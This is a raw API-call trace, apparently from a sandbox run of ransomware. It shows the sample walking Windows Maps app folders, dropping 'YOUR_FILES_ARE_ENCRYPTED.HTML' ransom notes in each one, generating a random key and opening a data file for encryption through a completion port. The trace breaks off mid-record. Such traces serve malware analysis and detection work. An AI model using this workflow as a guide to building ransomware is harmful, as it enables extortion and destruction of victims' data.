GetProcessHeap () returned 0x600000 [0120.454] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.454] GetProcessHeap () returned 0x600000 [0120.454] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.454] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.454] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.454] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache") returned 95 [0120.454] GetProcessHeap () returned 0x600000 [0120.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.455] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache" [0120.455] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\*" [0120.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.456] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.456] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.456] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.456] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.456] GetProcessHeap () returned 0x600000 [0120.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.457] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.458] CloseHandle (hObject=0x324) returned 1 [0120.458] GetProcessHeap () returned 0x600000 [0120.458] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.458] GetProcessHeap () returned 0x600000 [0120.458] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.458] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.458] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.458] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState") returned 95 [0120.458] GetProcessHeap () returned 0x600000 [0120.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.459] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState" [0120.459] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\*" [0120.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.459] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.459] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.459] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.459] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.459] GetProcessHeap () returned 0x600000 [0120.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.460] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.461] CloseHandle (hObject=0x324) returned 1 [0120.461] GetProcessHeap () returned 0x600000 [0120.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.461] GetProcessHeap () returned 0x600000 [0120.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.461] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x169557db, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.461] StrStrIW (lpFirst="Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.461] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe") returned 140 [0120.461] GetProcessHeap () returned 0x600000 [0120.461] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.461] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe" [0120.461] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\*" [0120.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x169557db, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.462] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x169557db, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.462] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.462] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.462] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 156 [0120.462] GetProcessHeap () returned 0x600000 [0120.462] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.463] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.463] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62e9e8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.465] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 1 [0120.465] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16d359a4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16d359a4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x311bec0, dwReserved1=0x62e9e8, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.465] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.465] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 176 [0120.465] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.465] lstrlenW (lpString=".dat") returned 4 [0120.465] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.465] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\microsoft.windowsmaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.466] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0120.466] GetProcessHeap () returned 0x600000 [0120.466] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.469] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="84") returned 2 [0120.469] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="55") returned 2 [0120.469] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="F5") returned 2 [0120.469] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="F4") returned 2 [0120.469] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="EC") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="AA") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="9F") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="8B") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="59") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="F9") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="49") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="44") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="3B") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="A0") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="DE") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="59") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="71") returned 2 [0120.469] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="5A") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="1C") returned 2 [0120.470] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="59") returned 2 [0120.470] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="47") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="90") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="1C") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="0E") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="A0") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="05") returned 2 [0120.470] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="AE") returned 2 [0120.470] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="DC") returned 2 [0120.470] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="5F") returned 2 [0120.470] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="B1") returned 2 [0120.470] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="5F") returned 2 [0120.470] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="65") returned 2 [0120.470] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.470] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.470] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.470] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x16a608f5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16a608f5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x311bec0, dwReserved1=0x62e9e8, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.471] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.471] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 181 [0120.471] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.471] lstrlenW (lpString=".LOG1") returned 5 [0120.471] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.471] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, 